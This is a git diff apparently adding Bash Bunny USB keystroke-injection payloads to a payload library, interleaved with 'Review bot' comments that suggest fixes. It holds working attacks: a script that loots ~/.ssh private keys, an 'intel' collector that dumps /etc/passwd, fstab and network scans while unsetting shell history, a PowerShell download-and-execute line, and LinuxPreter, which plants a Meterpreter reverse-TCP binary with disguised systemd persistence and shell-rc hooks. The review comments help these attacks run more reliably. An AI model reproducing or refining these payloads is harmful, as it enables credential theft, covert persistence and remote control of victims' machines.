+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [Looting] +Q STRING cp -r '~/.ssh' '$mntt/loot/SSH' +Q ENTER +Q DELAY 2000 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/exfiltration/intel/README.md b/payloads/library/exfiltration/intel/README.md new file mode 100644 index 00000000..a69f7558 --- /dev/null +++ b/payloads/library/exfiltration/intel/README.md 
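Review bot: `cp -r ~/.ssh $mntt/loot/SSH` writes to a fixed directory, so on the second run `SSH` already exists and `cp -r` nests the new copy as `loot/SSH/.ssh`, and a third run overwrites that nested copy — loot from different targets is silently clobbered. Use a per-run destination such as `cp -r ~/.ssh $mntt/loot/SSH-$(hostname)-$(date +%s)`, escaped Bunny-side like the existing `$(...)` lines. Private keys land unencrypted on the Bunny's removable storage; a header line telling operators to clear `/loot` after an engagement is appropriate for a credentials payload. The `lsblk | grep 1.8G` device discovery is shared with the BunnyLogger and intel payloads and matches any 1.8 GiB device; a lookup by the `BashBunny` volume label would be more reliable.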
@@ -0,0 +1,24 @@ +# intel(intelligence) + +## About: +* Title: intel +* Description: intel(intelligence) payload collects detailed information of victims machine. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Exfiltration +* Target: GNU/Linux +* Attackmodes: HID, Storage + +## intel(intelligence) payload collects detailed information of victims machine. + + +### Workflow: +1. Prevent storing history. +2. Fetching BashBunny's block device. +3. Mounting BashBunny. +4. Transfering payload script and executing it. +5. Deleting script from victims system. +6. Unmounting BashBunny. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/exfiltration/intel/intel.sh b/payloads/library/exfiltration/intel/intel.sh new file mode 100644 index 00000000..a3cec365 --- /dev/null +++ b/payloads/library/exfiltration/intel/intel.sh 
@@ -0,0 +1,67 @@ +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +echo -e "*******************************************" >> $mntt/loot/intel +echo "Network Schema:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +nmap -sV localhost >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Network Interfaces:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +ifconfig >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +ip addr >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +iwconfig >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo Storage Info: >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +findmnt >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +cat /etc/fstab >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "USB Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lsusb -v >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "PCI Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lspci -vvv >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "CPU Info:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +lscpu >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Systemd services:" 
>> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +systemctl list-units >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo User/groups: >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +id >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +cat /etc/passwd >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +echo "Installed packages:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +snap list >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +flatpak list --app >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "******************************************" >> $mntt/loot/intel +echo "Directory Structure:" >> $mntt/loot/intel +echo -e "*******************************************" >> $mntt/loot/intel +find * / >> $mntt/loot/intel +echo -e "\n" >> $mntt/loot/intel +echo -e "******************************************" >> $mntt/loot/intel diff --git a/payloads/library/exfiltration/intel/payload.txt b/payloads/library/exfiltration/intel/payload.txt new file mode 100644 index 00000000..17965860 --- /dev/null +++ b/payloads/library/exfiltration/intel/payload.txt 
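Review bot: `find * /` near the end walks the whole filesystem including `/proc`, `/sys`, `/dev` and the Bunny's own mount, and additionally lists the current directory a second time via `*`; its output is appended to a file on the Bunny's small storage, so the run takes minutes and can fill the device. Bound it, e.g. `find / -xdev \( -path /proc -o -path /sys -o -path /dev \) -prune -o -print >> "$mntt/loot/intel"`. All output goes with `>>` to the fixed path `$mntt/loot/intel`, so successive targets are interleaved in one file — a per-run name (hostname plus timestamp) avoids that. `nmap`, `ifconfig` and `iwconfig` are not guaranteed to exist on a current distribution; the failures are harmless but a `command -v` guard would keep the report readable. The file has no shebang and is run as `/tmp/./intel.sh`, so it executes under whatever the invoking shell falls back to; add `#!/bin/bash`.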
@@ -0,0 +1,56 @@ +# Title: intel +# Description: intel(intelligence) payload collects detailed information of victims machine. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Exfiltration +# Target: GNU/Linux operating systems. +# Attackmodes: HID, Storage. + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/intel.sh +Q ENTER +Q STRING /tmp/./intel.sh +Q ENTER +Q DELAY 25000 +Q STRING rm /tmp/intel.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/poc/MacOS_EICAR/eicar.sh b/payloads/library/poc/MacOS_EICAR/eicar.sh new file mode 100644 index 00000000..ddc8fd66 --- /dev/null +++ b/payloads/library/poc/MacOS_EICAR/eicar.sh @@ -0,0 +1,2 @@ +#!/bin/bash +echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt \ No newline at end of file diff --git a/payloads/library/poc/MacOS_EICAR/payload.txt b/payloads/library/poc/MacOS_EICAR/payload.txt new file mode 100644 index 00000000..e9df2733 --- /dev/null +++ b/payloads/library/poc/MacOS_EICAR/payload.txt 
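Review bot: `Q DELAY 25000` is a fixed guess at how long intel.sh takes, but the script runs `nmap -sV` and a `find` over the entire filesystem, so it will usually still be running when `LED FINISH` lights. The typed `rm` and `udisksctl unmount` commands are queued in the terminal and still execute in order, but an operator who unplugs on the green LED pulls a storage device that is being written to. Add a header comment such as `# NOTE: LED FINISH only means the keystrokes were injected; wait for the terminal to close before unplugging.` and repeat it in the README. The copy source `$mntt/payloads/intel.sh` is the udisk's top-level `payloads/` directory rather than the switch folder, and neither the README nor this header says where intel.sh must be placed.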
@@ -0,0 +1,32 @@
+#!/bin/bash
+# Title: MacOS_EICAR
+# Description: Bad USB PoC for MacOS.
+# Author: Ciph3rtxt
+# Category: PoC
+# Target: MacOS
+# Attackmodes: HID STORAGE
+
+# Setup
+LED R
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
+
+
+# Execute Attack
+LED R
+DELAY 200
+RUN OSX terminal
+Q DELAY 2000
+Q STRING cd
+Q ENTER
+Q DELAY 200
+Q STRING chmod a+x $path/eicar.sh
+Q ENTER
+Q DELAY 200
+Q STRING $path/eicar.sh
+Q ENTER
+Q DELAY 200
+
+# Complete
+LED G
\ No newline at end of file
diff --git a/payloads/library/poc/MacOS_EICAR/readme.md b/payloads/library/poc/MacOS_EICAR/readme.md
new file mode 100644
index 00000000..790607ce
--- /dev/null
+++ b/payloads/library/poc/MacOS_EICAR/readme.md
@@ -0,0 +1,19 @@
+# MacOS EICAR PoC
+
+Author: Ciph3rtxt
+
+
+## Category:
+
+PoC
+
+## Description:
+
+Generates EICAR file to simulate USB (physical access) malware attack.
+
+## Status:
+
+|LED|STATUS|
+|-|-|
+|Red|Attack|
+|Green|Complete|
\ No newline at end of file
diff --git a/payloads/library/prank/UnifiedRickRoll/payload.txt b/payloads/library/prank/UnifiedRickRoll/payload.txt
index c59d5611..d43fd529 100755
--- a/payloads/library/prank/UnifiedRickRoll/payload.txt
+++ b/payloads/library/prank/UnifiedRickRoll/payload.txt
@@ -13,7 +13,7 @@ Q DELAY 1000
 Q GUI n
 Q DELAY 1000
-Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
+Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
 # close up shop
 Q DELAY 1000
diff --git a/payloads/library/prank/Win_PoSh_HiThere/payload.txt b/payloads/library/prank/Win_PoSh_HiThere/payload.txt
new file mode 100644
index 00000000..a5127923
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/payload.txt
@@ -0,0 +1,37 @@
+#!/bin/bash
+# Title: Hi There
+# Description: Creates a hidden link file that override the ctrl+c functionality.
+# So, when the user press ctrl+c it lunches the first sign-in animation.
+# Author: Cribbit
+# Version: 1.0
+# Category: Pranks
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: RNDIS_ETHERNET HID
+# Props: v3ded, Hexacorn and Audibleblink (Python Server)
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so server starts immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+# attack commences
+LED ATTACK
+QUACK DELAY 200
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
+QUACK DELAY 500
+QUACK CTRL c
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSh_HiThere/readme.md b/payloads/library/prank/Win_PoSh_HiThere/readme.md
new file mode 100644
index 00000000..40b76c48
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/readme.md
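Review bot: `iptables -A OUTPUT -p udp --dport 53 -j DROP` is appended unconditionally, so each run of the payload adds another copy of the rule to the Bunny's OUTPUT chain and nothing in the script removes it; make it idempotent with `iptables -C OUTPUT -p udp --dport 53 -j DROP 2>/dev/null || iptables -A OUTPUT -p udp --dport 53 -j DROP`. The `python -m SimpleHTTPServer 80 &` job is likewise left running with no PID captured, so it can neither be checked nor stopped, and on a second run the `nc -z localhost 80` loop would presumably pass against the stale server while the new one fails to bind. Capturing `srv=$!` on that line and adding `kill "$srv"` before `LED FINISH` keeps the device in a known state between runs.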
@@ -0,0 +1,33 @@
+# Hi There
+- Author: Cribbit
+- Version: 1.0
+- Tested on: Windows 10 (Powershell 5.1+)
+- Category: Pranks
+- Attackmode: HID & RNDIS_ETHERNET
+- Extensions: Run
+- Props: v3ded, Hexacorn and Audibleblink (Python Server)
+
+## Change Log
+| Version | Changes |
+| ------- | --------------- |
+| 1.0 | Initial release |
+
+## Description
+Creates a hidden link file that override the ctrl+c functionality.
+So, when the user press ctrl+c it lunches the first sign-in animation.
+
+## Notes
+to kill the animation, you need to open task manger and look for "First Sign-in Animation".
+For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
+
+## More information
+
+
+
+
+## Colours
+| Status | Colour | Description |
+| -------- | ----------------------------- | --------------------------- |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISHED | Green blink followed by SOLID | Injection finished |
\ No newline at end of file
diff --git a/payloads/library/prank/Win_PoSh_HiThere/s b/payloads/library/prank/Win_PoSh_HiThere/s
new file mode 100644
index 00000000..2641a532
--- /dev/null
+++ b/payloads/library/prank/Win_PoSh_HiThere/s
@@ -0,0 +1,19 @@
+$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
+$wshell = New-Object -ComObject Wscript.Shell
+$shortcut = $wshell.CreateShortcut($path)
+
+$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
+
+$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
+$shortcut.Arguments = "/RunFirstLogonAnim"
+$shortcut.WorkingDirectory = "C:"
+$shortcut.HotKey = "CTRL+C"
+$shortcut.Description = "Contain very important information"
+
+$shortcut.WindowStyle = 7
+ # 7 = Minimized window
+ # 3 = Maximized window
+ # 1 = Normal window
+$shortcut.Save()
+
+(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)
\ No newline at end of file
diff --git a/payloads/library/remote_access/LinuxPreter/README.md b/payloads/library/remote_access/LinuxPreter/README.md
new file mode 100644
index 00000000..0a0933a9
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/README.md
@@ -0,0 +1,36 @@
+## About:
+* Title: LinuxPreter
+* Description: Injects meterpreter payload and makes it persistent.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Remote Access
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
+
+### Workflow:
+* Keeping tracks clear by preventing storage of history.
+* Fetching BashBunny's block device and mounting it.
+* Transfering payload script and payload itself.
+* Deleting scripts from victims machine and unmounting bunny.
+
+### Create Meterpreter payload:
+* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf -o sysHandle.bin```
+* NOTE: Only change IP address and Port number in the above command.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| sysHandle.bin | /tools/ |
+
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/remote_access/LinuxPreter/payload.sh b/payloads/library/remote_access/LinuxPreter/payload.sh
new file mode 100644
index 00000000..cfecd2cf
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.sh
@@ -0,0 +1,12 @@
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+mkdir /var/tmp/.system
+cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
+chmod +x /var/tmp/.system/sysHandle.bin
+mkdir -p ~/.config/systemd/user/
+systemctl --user start systemPer.service
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
+
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
diff --git a/payloads/library/remote_access/LinuxPreter/payload.txt b/payloads/library/remote_access/LinuxPreter/payload.txt
new file mode 100644
index 00000000..34118624
--- /dev/null
+++ b/payloads/library/remote_access/LinuxPreter/payload.txt
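Review bot: payload.sh carries no header block, unlike the payload.txt files and eicar.sh in this commit, which all open with `# Title:` / `# Description:` lines; the files it reads from the storage partition and the paths it writes are only discoverable by decoding the two long `echo -e` strings. A short header stating that it expects `tools/sysHandle.bin` on the mounted storage and that it creates `/var/tmp/.system`, `~/.config/systemd/user/systemPer.service` and appends lines to `~/.zshrc` / `~/.bashrc` would let a reviewer audit the footprint without tracing the echoes. The README's "Directory Structure" table should also list `~/tmmmp`, since it is created and removed here as well.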
@@ -0,0 +1,56 @@
+# Title: LinuxPreter
+# Description: Injects meterpreter payload and makes it persistent.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Remote Access
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 1000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
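Review bot: `Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/` reads the script from `payloads/` on the storage partition, but the README added in this commit places payload.sh under `/payload/` and payload.txt under `/payload/switch1/`; the two disagree, and since the Bash Bunny storage tree uses `payloads/`, the README table rows should read `/payloads/switch1/` and `/payloads/`. The README also states the LED sequence as SETUP, ATTACK, FINISH, which matches this file, but it does not mention that `payload.sh` is deleted from `/tmp` after a fixed `Q DELAY 1000` with no check that it finished; a one-line comment above that delay stating the assumption would help whoever tunes it.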